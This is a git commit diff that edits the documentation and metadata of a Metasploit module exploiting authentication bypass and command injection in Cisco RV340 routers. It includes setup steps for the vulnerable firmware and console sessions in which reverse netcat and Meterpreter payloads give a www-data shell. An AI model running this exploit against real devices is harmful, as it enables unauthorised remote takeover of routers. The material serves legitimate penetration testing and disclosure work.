Minor fixes from review
This commit is contained in:
parent
4b05ba6189
commit
f2a86327d0
|
@ -9,14 +9,19 @@ Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03
|
|||
|
||||
### Installation
|
||||
|
||||
Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
||||
Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
|
||||
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
||||
|
||||
Log into the modem. Default IP address is 192.168.1.1 and default credentials
|
||||
are cisco for username and password. The `administration` option on the left
|
||||
side of the web page will take you to a form with a `Manual Upgrade` section.
|
||||
Leave `File Type: ` on default `Firmware Image` option. Change `Upgrade From:` option to `PC`. Press the `Upgrade` button.
|
||||
Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`. Wait for router
|
||||
reboot to complete.
|
||||
To install this firmware, follow the following directions:
|
||||
1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
|
||||
are `cisco` for the username and password.
|
||||
2. The `administration` option on the left side of the web page will take you to a form
|
||||
with a `Manual Upgrade` section.
|
||||
3. Leave `File Type: ` on the default `Firmware Image` option.
|
||||
4. Change `Upgrade From:` option to `PC`.
|
||||
5. Press the `Upgrade` button.
|
||||
6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
|
||||
7. Wait for router reboot to complete.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
@ -26,16 +31,14 @@ reboot to complete.
|
|||
4. Do: `set lhost <listening ip>`
|
||||
5. Do: `set rhost <target ip>`
|
||||
6. Do: `exploit`
|
||||
7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
|
||||
8. Verify: You are the "www-data" user using the `id` command
|
||||
7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
|
||||
8. Verify: You are the `www-data` user using the `id` command
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Reverse Netcat Output
|
||||
|
||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
||||
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
|
||||
|
||||
```
|
||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||
|
@ -55,11 +58,9 @@ msf6 exploit(linux/http/cisco_rv340_lan) > exploit
|
|||
|
||||
id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
```
|
||||
### Meterpreter Linux Dropper
|
||||
|
||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
||||
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
|
||||
|
||||
```
|
||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||
|
@ -90,5 +91,4 @@ Process 11012 created.
|
|||
Channel 1 created.
|
||||
id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
```
|
||||
|
|
|
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
versions 1.0.03.24 and below.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['Linux', 'Unix'],
|
||||
'Platform' => ['linux', 'unix'],
|
||||
'Author' => [
|
||||
'Biem Pham', # Vulnerability Discoveries
|
||||
'Neterum', # Metasploit Module
|
||||
|
@ -33,10 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DisclosureDate' => '2021-11-02',
|
||||
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
||||
'References' => [
|
||||
[ 'CVE', '2022-20705'], # Authentication Bypass
|
||||
[ 'CVE', '2022-20707'], # Command Injection
|
||||
[ 'ZDI', '22-410'], # Authentication Bypass
|
||||
[ 'ZDI', '22-411'] # Command Injection
|
||||
['CVE', '2022-20705'], # Authentication Bypass
|
||||
['CVE', '2022-20707'], # Command Injection
|
||||
['ZDI', '22-410'], # Authentication Bypass
|
||||
['ZDI', '22-411'] # Command Injection
|
||||
],
|
||||
'Targets' => [
|
||||
[
|
||||
|
|
Loading…
Reference in New Issue